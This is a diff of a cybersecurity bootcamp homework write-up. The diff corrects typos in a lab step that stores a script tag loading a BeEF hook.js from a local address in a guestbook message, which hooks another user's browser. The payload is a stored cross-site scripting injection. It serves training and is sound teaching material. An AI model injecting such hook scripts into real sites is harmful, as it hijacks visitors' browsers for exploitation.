grotms-IHKddd/CyberSecurity-Bootcamp/HW-15/SubmissionFile.md

         <script src="http://127.0.0.1:3000/hook.js"></script>

-By placing that into the message of the book we can book this other browser and exploit.
+By placing that into the message of the book we can hook this other browser and exploit it.

 ![](/HW-15/Images/15-12%20Beef.png)

-This results in new IP address being added to the beef list of vulnerable browers.
+This results in a new IP address being added to the beef list of vulnerable browsers.

 ![](/HW-15/Images/15-13%20Beef.png)